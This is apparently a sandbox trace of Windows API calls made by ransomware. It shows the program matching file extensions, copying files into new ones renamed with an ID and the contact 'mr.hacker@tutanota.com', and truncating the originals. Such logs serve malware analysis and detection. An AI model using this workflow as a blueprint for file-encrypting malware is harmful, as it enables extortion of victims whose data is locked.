1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString=".zip") returned 4 [0274.084] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString=".rar") returned 4 [0274.084] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString=".bz2") returned 4 [0274.084] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.084] lstrlenW (lpString=".7z") returned 3 [0274.084] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString=".dbf") returned 4 [0274.084] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString=".1cd") returned 4 [0274.084] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString=".jpg") returned 4 [0274.084] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.084] lstrlenW (lpString=".doc") returned 4 [0274.084] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString=".docx") returned 5 [0274.084] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0274.084] lstrlenW (lpString=".pdf") returned 4 [0274.084] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0274.084] lstrlenW (lpString=".xls") returned 4 [0274.084] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0274.085] lstrlenW (lpString=".xlsx") returned 5 [0274.085] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0274.085] lstrlenW (lpString=".ppt") returned 4 [0274.085] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0274.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.085] lstrlenW (lpString=".zip") returned 4 [0274.085] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0274.085] lstrlenW (lpString=".rar") returned 4 [0274.085] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0274.085] lstrlenW (lpString=".bz2") returned 4 [0274.085] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0274.085] lstrlenW (lpString=".7z") returned 3 [0274.085] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0274.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.085] lstrlenW (lpString=".dbf") returned 4 [0274.085] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0274.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.085] lstrlenW (lpString=".1cd") returned 4 [0274.085] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0274.085] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFINTL.DLL") returned 59 [0274.085] lstrlenW (lpString=".jpg") returned 4 [0274.085] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0274.085] lstrcmpiW (lpString1=".HXS", lpString2=".USA") returned -1 [0274.085] lstrlenW (lpString="INFOPATH.HXS") returned 12 [0274.085] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0274.086] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x380ff1c | out: lpFileSize=0x380ff1c*=1527046) returned 1 [0274.087] CloseHandle (hObject=0x348) returned 1 [0274.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs")) returned 0x20 [0274.087] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0274.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0274.087] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.087] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\infopath.hxs.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0 [0274.087] GetLastError () returned 0x0 [0274.087] ReadFile (in: hFile=0x348, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0274.111] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0274.127] ReadFile (in: hFile=0x348, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x74d16, lpOverlapped=0x0) returned 1 [0274.225] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0x74d20, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0x74d20, lpOverlapped=0x0) returned 1 [0274.234] ReadFile (in: hFile=0x348, lpBuffer=0x3df0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x380fed4, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesRead=0x380fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.234] WriteFile (in: hFile=0x3c0, lpBuffer=0x3df0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x380fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3df0020*, lpNumberOfBytesWritten=0x380fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.234] SetEndOfFile (hFile=0x3c0) returned 1 [0274.234] CloseHandle (hObject=0x3c0) returned 1 [0274.234] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x380fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.234] SetEndOfFile (hFile=0x348) returned 1 [0274.495] CloseHandle (hObject=0x348) returned 1 [0274.495] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\INFOPATH.HXS.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) Thread: id = 64 os_tid = 0x698 [0263.682] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x3560098 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10000) returned 0x35700a0 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b35f0 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x6) returned 0x5b3818 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3608 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x100000) returned 0x3f00020 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3620 [0263.683] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3620, Size=0x20) returned 0x607af8 [0263.683] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x5b3620 [0263.683] RtlReAllocateHeap (Heap=0x520000, Flags=0x0, Ptr=0x5b3620, Size=0x20) returned 0x607a80 [0263.683] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76890000 [0263.684] GetProcAddress (hModule=0x76890000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x768bd650 [0263.684] Wow64DisableWow64FsRedirection (in: OldValue=0x394ff58 | out: OldValue=0x394ff58*=0x0) returned 1 [0263.684] lstrlenW (lpString="kernel32.dll") returned 12 [0263.684] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607af8 | out: hHeap=0x520000) returned 1 [0263.684] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0263.684] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x607a80 | out: hHeap=0x520000) returned 1 [0263.684] Sleep (dwMilliseconds=0x64) [0263.977] lstrcmpiW (lpString1=".ttf", lpString2=".USA") returned -1 [0263.977] lstrlenW (lpString="kor_boot.ttf") returned 12 [0263.977] CreateFileW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x344 [0264.019] GetFileSizeEx (in: hFile=0x344, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=2371360) returned 1 [0264.019] CloseHandle (hObject=0x344) returned 1 [0264.019] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf")) returned 0x20 [0264.038] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.038] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\kor_boot.ttf.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0 [0264.038] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.038] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.038] lstrlenW (lpString=".doc") returned 4 [0264.038] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.038] lstrlenW (lpString=".docx") returned 5 [0264.038] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.038] lstrlenW (lpString=".pdf") returned 4 [0264.038] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.038] lstrlenW (lpString=".xls") returned 4 [0264.038] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.038] lstrlenW (lpString=".xlsx") returned 5 [0264.038] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.038] lstrlenW (lpString=".ppt") returned 4 [0264.038] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.038] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.038] lstrlenW (lpString=".zip") returned 4 [0264.038] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.038] lstrlenW (lpString=".rar") returned 4 [0264.038] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.038] lstrlenW (lpString=".bz2") returned 4 [0264.038] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.038] lstrlenW (lpString=".7z") returned 3 [0264.038] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.038] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString=".dbf") returned 4 [0264.039] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString=".1cd") returned 4 [0264.039] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString=".jpg") returned 4 [0264.039] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString=".doc") returned 4 [0264.039] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString=".docx") returned 5 [0264.039] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0264.039] lstrlenW (lpString=".pdf") returned 4 [0264.039] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString=".xls") returned 4 [0264.039] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0264.039] lstrlenW (lpString=".xlsx") returned 5 [0264.039] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0264.039] lstrlenW (lpString=".ppt") returned 4 [0264.039] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.039] lstrlenW (lpString=".zip") returned 4 [0264.039] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0264.039] lstrlenW (lpString=".rar") returned 4 [0264.039] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0264.039] lstrlenW (lpString=".bz2") returned 4 [0264.039] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0264.040] lstrlenW (lpString=".7z") returned 3 [0264.040] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0264.040] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.040] lstrlenW (lpString=".dbf") returned 4 [0264.040] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0264.040] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.040] lstrlenW (lpString=".1cd") returned 4 [0264.040] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0264.040] lstrlenW (lpString="C:\\Boot\\Fonts\\kor_boot.ttf") returned 26 [0264.040] lstrlenW (lpString=".jpg") returned 4 [0264.040] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0264.040] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.040] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0264.040] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.040] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=93248) returned 1 [0264.040] CloseHandle (hObject=0x34c) returned 1 [0264.040] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui")) returned 0x20 [0264.040] GetFileAttributesW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.040] CreateFileW (lpFileName="C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.040] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString=".doc") returned 4 [0264.041] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.041] lstrlenW (lpString=".docx") returned 5 [0264.041] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.041] lstrlenW (lpString=".pdf") returned 4 [0264.041] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.041] lstrlenW (lpString=".xls") returned 4 [0264.041] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.041] lstrlenW (lpString=".xlsx") returned 5 [0264.041] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.041] lstrlenW (lpString=".ppt") returned 4 [0264.041] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.041] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString=".zip") returned 4 [0264.041] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.041] lstrlenW (lpString=".rar") returned 4 [0264.041] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.041] lstrlenW (lpString=".bz2") returned 4 [0264.041] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.041] lstrlenW (lpString=".7z") returned 3 [0264.041] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.041] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString=".dbf") returned 4 [0264.041] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.041] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString=".1cd") returned 4 [0264.041] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.041] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.041] lstrlenW (lpString=".jpg") returned 4 [0264.042] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.042] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.042] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.042] lstrlenW (lpString=".doc") returned 4 [0264.042] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.042] lstrlenW (lpString=".docx") returned 5 [0264.042] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.042] lstrlenW (lpString=".pdf") returned 4 [0264.042] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.042] lstrlenW (lpString=".xls") returned 4 [0264.042] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.042] lstrlenW (lpString=".xlsx") returned 5 [0264.042] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.042] lstrlenW (lpString=".ppt") returned 4 [0264.042] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.042] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.042] lstrlenW (lpString=".zip") returned 4 [0264.042] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.042] lstrlenW (lpString=".rar") returned 4 [0264.042] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.042] lstrlenW (lpString=".bz2") returned 4 [0264.042] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.042] lstrlenW (lpString=".7z") returned 3 [0264.042] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.042] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.042] lstrlenW (lpString=".dbf") returned 4 [0264.042] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.042] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.042] lstrlenW (lpString=".1cd") returned 4 [0264.042] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.043] lstrlenW (lpString="C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 29 [0264.043] lstrlenW (lpString=".jpg") returned 4 [0264.043] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.043] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.043] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0264.043] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.043] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=90688) returned 1 [0264.043] CloseHandle (hObject=0x34c) returned 1 [0264.043] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui")) returned 0x20 [0264.043] GetFileAttributesW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0264.043] CreateFileW (lpFileName="C:\\Boot\\hu-HU\\bootmgr.exe.mui" (normalized: "c:\\boot\\hu-hu\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0264.043] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.043] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.043] lstrlenW (lpString=".doc") returned 4 [0264.043] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.043] lstrlenW (lpString=".docx") returned 5 [0264.043] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.043] lstrlenW (lpString=".pdf") returned 4 [0264.043] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.044] lstrlenW (lpString=".xls") returned 4 [0264.044] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.044] lstrlenW (lpString=".xlsx") returned 5 [0264.044] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.044] lstrlenW (lpString=".ppt") returned 4 [0264.044] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString=".zip") returned 4 [0264.044] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.044] lstrlenW (lpString=".rar") returned 4 [0264.044] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.044] lstrlenW (lpString=".bz2") returned 4 [0264.044] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.044] lstrlenW (lpString=".7z") returned 3 [0264.044] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString=".dbf") returned 4 [0264.044] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString=".1cd") returned 4 [0264.044] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString=".jpg") returned 4 [0264.044] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.044] lstrlenW (lpString=".doc") returned 4 [0264.044] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0264.044] lstrlenW (lpString=".docx") returned 5 [0264.045] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0264.045] lstrlenW (lpString=".pdf") returned 4 [0264.045] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0264.045] lstrlenW (lpString=".xls") returned 4 [0264.045] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0264.045] lstrlenW (lpString=".xlsx") returned 5 [0264.045] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0264.045] lstrlenW (lpString=".ppt") returned 4 [0264.045] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0264.045] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.045] lstrlenW (lpString=".zip") returned 4 [0264.045] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0264.045] lstrlenW (lpString=".rar") returned 4 [0264.045] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0264.045] lstrlenW (lpString=".bz2") returned 4 [0264.045] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0264.045] lstrlenW (lpString=".7z") returned 3 [0264.045] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0264.045] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.045] lstrlenW (lpString=".dbf") returned 4 [0264.045] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0264.045] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.045] lstrlenW (lpString=".1cd") returned 4 [0264.045] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0264.045] lstrlenW (lpString="C:\\Boot\\hu-HU\\bootmgr.exe.mui") returned 29 [0264.045] lstrlenW (lpString=".jpg") returned 4 [0264.045] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0264.046] lstrcmpiW (lpString1=".mui", lpString2=".USA") returned -1 [0264.046] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0264.046] CreateFileW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x34c [0264.046] GetFileSizeEx (in: hFile=0x34c, lpFileSize=0x394ff1c | out: lpFileSize=0x394ff1c*=90704) returned 1 [0264.046] CloseHandle (hObject=0x34c) returned 1 [0264.046] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui" (normalized: "c:\\boot\\it-it\\bootmgr.exe.mui")) returned 0x20 [0264.046] GetFileAttributesW (lpFileName="C:\\Boot\\it-IT\\bootmgr.exe.mui.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: 